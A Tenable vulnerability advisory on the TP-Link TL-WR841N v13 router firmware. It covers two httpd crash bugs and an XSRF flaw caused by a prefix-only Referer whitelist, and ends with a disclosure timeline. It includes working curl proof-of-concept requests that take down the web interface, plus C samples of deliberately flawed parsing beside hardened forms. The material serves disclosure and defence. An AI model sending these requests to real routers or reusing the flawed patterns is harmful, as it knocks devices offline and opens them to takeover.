
[R1] TP-Link TL-WRN841N Multiple Vulnerabilities

Critical

Synopsis

Tenable was recently investigating TP-Link's TL-WR841N v13 using firmware 0.9.1 4.16 v0348.0 (listed as TL-WR841N(US)_V13_180119 on the download page). As a result, Tenable found multiple vulnerabilities.

CVE-2018-15700: httpd Denial of Service via Referer Header

A locally connected user sending an HTTP request with a missing protocol string in the "Referer" field will cause the httpd service to terminate. We believe this is a NULL pointer dereference in the http_parser_main function. The problem starts with a memcmp looking for "http://" in the first seven bytes of the "Referer" field. Only if this succeeds is a "Referer" string variable initialized. When the memcmp fails, program flow still continues and attempts string operations on the uninitialized (NULL) string. The resulting crash requires a router reboot to revive the httpd web interface.

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: DOS' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' --compressed
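As an added illustration (not TP-Link's httpd code), the following C reconstructs the control-flow defect described above beside a hardened form; the function names, the host buffer size and the exact string operations are assumptions, since the advisory only describes the memcmp check and the subsequent use of the uninitialized string.

```c
#include <stddef.h>
#include <string.h>

/* Flawed pattern (kept only for comparison; never call it with a value that
 * lacks the scheme): referer is set only when the scheme matches, yet the
 * string operations below run regardless, so a Referer of "DOS" reaches
 * strcspn() through a NULL pointer and takes the daemon down with it. */
int referer_host_flawed(const char *hdr, char *out, size_t outsz)
{
    const char *referer = NULL;
    if (memcmp(hdr, "http://", 7) == 0)    /* may read 7 bytes even if hdr is shorter */
        referer = hdr + 7;
    size_t n = strcspn(referer, "/");     /* NULL dereference when the scheme is missing */
    if (n >= outsz)
        return -1;
    memcpy(out, referer, n);
    out[n] = '\0';
    return 0;
}

/* Hardened form: strncmp stops at the terminator (no over-read on short
 * values) and a missing scheme fails closed, so the request is rejected
 * instead of crashing httpd.  An absent header (NULL) takes the same path. */
int referer_host_checked(const char *hdr, char *out, size_t outsz)
{
    if (hdr == NULL || strncmp(hdr, "http://", 7) != 0)
        return -1;                         /* malformed Referer: reject, do not parse */
    const char *referer = hdr + 7;
    size_t n = strcspn(referer, "/");
    if (n == 0 || n >= outsz)
        return -1;                         /* empty host, or host too long for out */
    memcpy(out, referer, n);
    out[n] = '\0';
    return 0;
}

/* What the request handler should do with the result: a parse failure is
 * a 400 for that one request, not a reboot for every user of the router. */
int referer_status(const char *hdr)
{
    char host[64];
    return referer_host_checked(hdr, host, sizeof host) == 0 ? 200 : 400;
}
```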

CVE-2018-15701: httpd Denial of Service via Cookie Header

Crafting an HTTP request with an HTTP "Cookie" field of "Authorization;" will result in the httpd service terminating. Again, a router reboot is required to revive the web interface. We believe this is another parsing error in "http_parser_main".

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://tplinkwifi.net/' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' -H 'Cookie: Authorization;' --compressed

CVE-2018-15702: XSRF due to Incomplete Referer Check

In the http_parser_main function, referer whitelisting is accomplished using strncmp with a length field derived from "tplinklogin.net", "tplinkwifi.net", or router IP strings. Since strncmp is only comparing the first few characters of the referer domain string, an attacker can pass this check by crafting a domain or subdomain of "tplinklogin.net*", "tplinkwifi.net*", or "<router's IP>*".

This issue is magnified in severity due to a previously disclosed but unpatched authentication bypass vulnerability (CVE-2018-11714). This allows a remote attacker to perform XSRF against various sensitive cgi scripts. A remote attacker is able to enable remote management and reset the router admin password.
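As an added example (not TP-Link's code), here is the prefix-only whitelist comparison described above beside an exact-match form, in C; the two hostnames are the advisory's, the router IP is a constructed sample and the function names are assumptions. Inputs are the host part of the Referer value, already separated from scheme, port and path.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

static const char *const allowed_hosts[] = {
    "tplinklogin.net",
    "tplinkwifi.net",
    "192.168.0.1",          /* constructed: stands in for the router's LAN IP */
};
#define N_ALLOWED (sizeof allowed_hosts / sizeof allowed_hosts[0])

/* Flawed pattern: strncmp bounded by the length of the whitelist entry only
 * proves that the host *starts with* an entry, so "tplinkwifi.net.example"
 * and "192.168.0.100" both pass. */
int referer_allowed_prefix(const char *host)
{
    for (size_t i = 0; i < N_ALLOWED; i++)
        if (strncmp(host, allowed_hosts[i], strlen(allowed_hosts[i])) == 0)
            return 1;
    return 0;
}

/* Hardened form: the whole host must equal an entry.  A trailing dot (FQDN
 * form) is tolerated and the comparison is case-insensitive, as DNS names
 * are, but the lengths must match, so no prefix or suffix passes. */
int referer_allowed_exact(const char *host)
{
    size_t len = strlen(host);
    if (len > 0 && host[len - 1] == '.')
        len--;                              /* "tplinkwifi.net." -> "tplinkwifi.net" */
    for (size_t i = 0; i < N_ALLOWED; i++) {
        const char *a = allowed_hosts[i];
        if (strlen(a) != len)
            continue;                       /* different length: cannot be equal */
        size_t k = 0;
        while (k < len && tolower((unsigned char)host[k]) == (unsigned char)a[k])
            k++;
        if (k == len)
            return 1;
    }
    return 0;
}
```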

Solution

Currently no solution exists. At time of publication, the most recent firmware version on TP-Link's website is listed as TL-WR841N(US)_V13_180119 which is the vulnerable firmware version (0.9.1 4.16 v0348.0).

Disclosure Timeline

07-02-2018 - Tenable sends vulnerability write up and proof of concepts to TP-Link.
07-18-2018 - Tenable asks TP-Link for acknowledgement.
07-18-2018 - TP-Link says all the bugs are already fixed and suggests Tenable verify using the latest firmware.
07-27-2018 - Tenable confirms the vulnerabilities still exist in the latest build (0.9.1 4.16 v0348.0 Build 180119 Rel 66498n). Tenable asks if there is a more recent unpublished build.
07-27-2018 - TP-Link says they will check the firmware and let Tenable know.
08-27-2018 - Tenable asks for an update.
08-27-2018 - TP-Link asks for hardware version and firmware version.
08-27-2018 - Tenable responds with TL-WR841N V13 0.9.1 4.16 v0348.0 Build 180119 Rel 66498n.
08-27-2018 - TP-Link sends a beta firmware for Tenable to test.
08-27-2018 - TP-Link follows up that they hope for feedback ASAP.
08-27-2018 - Tenable can't download the rar attachment via email.
08-27-2018 - TP-Link suggests using WeTransfer.
08-27-2018 - Tenable agrees.
08-30-2018 - Tenable asks TP-Link for an update.
08-30-2018 - TP-Link says they sent a WeTransfer. They'll try again.
08-30-2018 - Tenable receives the firmware (0.9.1 4.16 v0348.0 Build 180821 Rel.42708n(Beta)) and confirms that two vulnerabilities still exist.
08-30-2018 - TP-Link notifies Tenable of another WeTransfer.
08-30-2018 - Tenable informs TP-Link that they sent the exact same firmware as before.
09-20-2018 - Tenable asks TP-Link for an update.
09-20-2018 - TP-Link says they already sent the beta version.
09-20-2018 - Tenable says they haven't received anything new.
09-20-2018 - TP-Link says WeTransfer informed them that Tenable downloaded the firmware. Asks Tenable for an email address that doesn't block rar files.
09-20-2018 - Tenable reiterates that the last downloaded version was vulnerable. Tenable asks for a new version via WeTransfer.
10-01-2018 - Tenable reminds TP-Link that today is the 90 day disclosure day.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]
